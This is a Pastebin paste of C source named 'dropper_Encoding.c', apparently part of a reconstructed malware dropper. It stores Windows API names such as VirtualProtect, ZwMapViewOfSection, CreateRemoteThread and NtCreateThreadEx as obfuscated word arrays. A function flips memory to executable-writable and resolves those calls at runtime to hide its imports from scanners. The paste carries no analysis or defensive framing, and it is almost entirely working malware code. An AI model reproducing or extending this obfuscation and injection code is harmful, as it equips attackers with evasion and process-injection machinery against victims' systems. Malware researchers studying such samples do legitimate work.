Advertisement
FlyFar

dropper_Encoding.c

Feb 18th, 2023
711
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.86 KB | Cybersecurity | 0 0
  1. #include "4. Encoding.h"
  2. #include "9. AssemblyBlock2.h"
  3. #include "A. EncodingAlgorithms.h"
  4.  
  5. #include "define.h"
  6.  
  7. const WORD ENCODED_lstrcmpiW[10] =
  8. {
  9.     0xAE7E, 0xAE61, 0xAE66, 0xAE60,
  10.     0xAE71, 0xAE7F, 0xAE62, 0xAE7B,
  11.     0xAE45, 0xAE12
  12. };
  13.  
  14. const WORD ENCODED_VirtualQuery[13] =
  15. {
  16.     0xAE44, 0xAE7B, 0xAE60, 0xAE66,
  17.     0xAE67, 0xAE73, 0xAE7E, 0xAE43,
  18.     0xAE67, 0xAE77, 0xAE60, 0xAE6B,
  19.     0xAE12
  20. };
  21.  
  22. const WORD ENCODED_VirtualProtect[15] =
  23. {
  24.     0xAE44, 0xAE7B, 0xAE60, 0xAE66,
  25.     0xAE67, 0xAE73, 0xAE7E, 0xAE42,
  26.     0xAE60, 0xAE7D, 0xAE66, 0xAE77,
  27.     0xAE71, 0xAE66, 0xAE12
  28. };
  29.  
  30. const WORD ENCODED_GetProcAddress[15] =
  31. {
  32.     0xAE55, 0xAE77, 0xAE66, 0xAE42,
  33.     0xAE60, 0xAE7D, 0xAE71, 0xAE53,
  34.     0xAE76, 0xAE76, 0xAE60, 0xAE77,
  35.     0xAE61, 0xAE61, 0xAE12
  36. };
  37.  
  38. const WORD ENCODED_MapViewOfFile[14] =
  39. {
  40.     0xAE5F, 0xAE73, 0xAE62, 0xAE44,
  41.     0xAE7B, 0xAE77, 0xAE65, 0xAE5D,
  42.     0xAE74, 0xAE54, 0xAE7B, 0xAE7E,
  43.     0xAE77, 0xAE12
  44. };
  45.  
  46. const WORD ENCODED_UnmapViewOfFile[16] =
  47. {
  48.     0xAE47, 0xAE7C, 0xAE7F, 0xAE73,
  49.     0xAE62, 0xAE44, 0xAE7B, 0xAE77,
  50.     0xAE65, 0xAE5D, 0xAE74, 0xAE54,
  51.     0xAE7B, 0xAE7E, 0xAE77, 0xAE12
  52. };
  53.  
  54. const WORD ENCODED_FlushInstructionCache[22] =
  55. {
  56.     0xAE54, 0xAE7E, 0xAE67, 0xAE61,
  57.     0xAE7A, 0xAE5B, 0xAE7C, 0xAE61,
  58.     0xAE66, 0xAE60, 0xAE67, 0xAE71,
  59.     0xAE66, 0xAE7B, 0xAE7D, 0xAE7C,
  60.     0xAE51, 0xAE73, 0xAE71, 0xAE7A,
  61.     0xAE77, 0xAE12
  62. };
  63.  
  64. const WORD ENCODED_LoadLibraryW[13] =
  65. {
  66.     0xAE5E, 0xAE7D, 0xAE73, 0xAE76,
  67.     0xAE5E, 0xAE7B, 0xAE70, 0xAE60,
  68.     0xAE73, 0xAE60, 0xAE6B, 0xAE45,
  69.     0xAE12
  70. };
  71.  
  72. const WORD ENCODED_FreeLibrary[12] =
  73. {
  74.     0xAE54, 0xAE60, 0xAE77, 0xAE77,
  75.     0xAE5E, 0xAE7B, 0xAE70, 0xAE60,
  76.     0xAE73, 0xAE60, 0xAE6B, 0xAE12
  77. };
  78.  
  79. const WORD ENCODED_ZwCreateSection[16] =
  80. {
  81.     0xAE48, 0xAE65, 0xAE51, 0xAE60,
  82.     0xAE77, 0xAE73, 0xAE66, 0xAE77,
  83.     0xAE41, 0xAE77, 0xAE71, 0xAE66,
  84.     0xAE7B, 0xAE7D, 0xAE7C, 0xAE12
  85. };
  86.  
  87. const WORD ENCODED_ZwMapViewOfSection[19] =
  88. {
  89.     0xAE48, 0xAE65, 0xAE5F, 0xAE73,
  90.     0xAE62, 0xAE44, 0xAE7B, 0xAE77,
  91.     0xAE65, 0xAE5D, 0xAE74, 0xAE41,
  92.     0xAE77, 0xAE71, 0xAE66, 0xAE7B,
  93.     0xAE7D, 0xAE7C, 0xAE12
  94. };
  95.  
  96. const WORD ENCODED_CreateThread[13] =
  97. {
  98.     0xAE51, 0xAE60, 0xAE77, 0xAE73,
  99.     0xAE66, 0xAE77, 0xAE46, 0xAE7A,
  100.     0xAE60, 0xAE77, 0xAE73, 0xAE76,
  101.     0xAE12
  102. };
  103.  
  104. const WORD ENCODED_WaitForSingleObject[20] =
  105. {
  106.     0xAE45, 0xAE73, 0xAE7B, 0xAE66,
  107.     0xAE54, 0xAE7D, 0xAE60, 0xAE41,
  108.     0xAE7B, 0xAE7C, 0xAE75, 0xAE7E,
  109.     0xAE77, 0xAE5D, 0xAE70, 0xAE78,
  110.     0xAE77, 0xAE71, 0xAE66, 0xAE12
  111. };
  112.  
  113. const WORD ENCODED_GetExitCodeThread[18] =
  114. {
  115.     0xAE55, 0xAE77, 0xAE66, 0xAE57,
  116.     0xAE6A, 0xAE7B, 0xAE66, 0xAE51,
  117.     0xAE7D, 0xAE76, 0xAE77, 0xAE46,
  118.     0xAE7A, 0xAE60, 0xAE77, 0xAE73,
  119.     0xAE76, 0xAE12
  120. };
  121.  
  122. const WORD ENCODED_ZwClose[8] =
  123. {
  124.     0xAE48, 0xAE65, 0xAE51, 0xAE7E,
  125.     0xAE7D, 0xAE61, 0xAE77, 0xAE12
  126. };
  127.  
  128. const WORD ENCODED_CreateRemoteThread[19] =
  129. {
  130.     0xAE51, 0xAE60, 0xAE77, 0xAE73,
  131.     0xAE66, 0xAE77, 0xAE40, 0xAE77,
  132.     0xAE7F, 0xAE7D, 0xAE66, 0xAE77,
  133.     0xAE46, 0xAE7A, 0xAE60, 0xAE77,
  134.     0xAE73, 0xAE76, 0xAE12
  135. };
  136.  
  137. const WORD ENCODED_NtCreateThreadEx[17] =
  138. {
  139.     0xAE5C, 0xAE66, 0xAE51, 0xAE60,
  140.     0xAE77, 0xAE73, 0xAE66, 0xAE77,
  141.     0xAE46, 0xAE7A, 0xAE60, 0xAE77,
  142.     0xAE73, 0xAE76, 0xAE57, 0xAE6A,
  143.     0xAE12
  144. };
  145.  
  146. // 100% (C) CODE MATCH
  147. BOOL DecodeEncryptedModuleNames()
  148. {
  149.     DWORD dwOld;
  150.    
  151.     if(!VirtualProtect((LPVOID)&g_hardAddrs, sizeof(HARDCODED_ADDRESSES), PAGE_EXECUTE_WRITECOPY, &dwOld) &&
  152.        !VirtualProtect((LPVOID)&g_hardAddrs, sizeof(HARDCODED_ADDRESSES), PAGE_EXECUTE_READWRITE, &dwOld))
  153.         return FALSE;
  154.    
  155.     *(HMODULE*)_F(NTDLL_DLL) = GetModuleNTDLL();
  156.    
  157.     *(DWORD*)_F(lstrcmpiW            ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_lstrcmpiW);
  158.     *(DWORD*)_F(VirtualQuery         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_VirtualQuery);
  159.     *(DWORD*)_F(VirtualProtect       ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_VirtualProtect);
  160.     *(DWORD*)_F(GetProcAddress       ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_GetProcAddress);
  161.     *(DWORD*)_F(MapViewOfFile        ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_MapViewOfFile);
  162.     *(DWORD*)_F(UnmapViewOfFile      ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_UnmapViewOfFile);
  163.     *(DWORD*)_F(FlushInstructionCache) = (DWORD)GetFunctionFromKERNEL32(ENCODED_FlushInstructionCache);
  164.     *(DWORD*)_F(LoadLibraryW         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_LoadLibraryW);
  165.     *(DWORD*)_F(FreeLibrary          ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_FreeLibrary);
  166.     *(DWORD*)_F(ZwCreateSection      ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwCreateSection);
  167.     *(DWORD*)_F(ZwMapViewOfSection   ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwMapViewOfSection);
  168.     *(DWORD*)_F(CreateThread         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_CreateThread);
  169.     *(DWORD*)_F(WaitForSingleObject  ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_WaitForSingleObject);
  170.     *(DWORD*)_F(GetExitCodeThread    ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_GetExitCodeThread);
  171.     *(DWORD*)_F(ZwClose              ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwClose);
  172.    
  173.     return TRUE;
  174. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement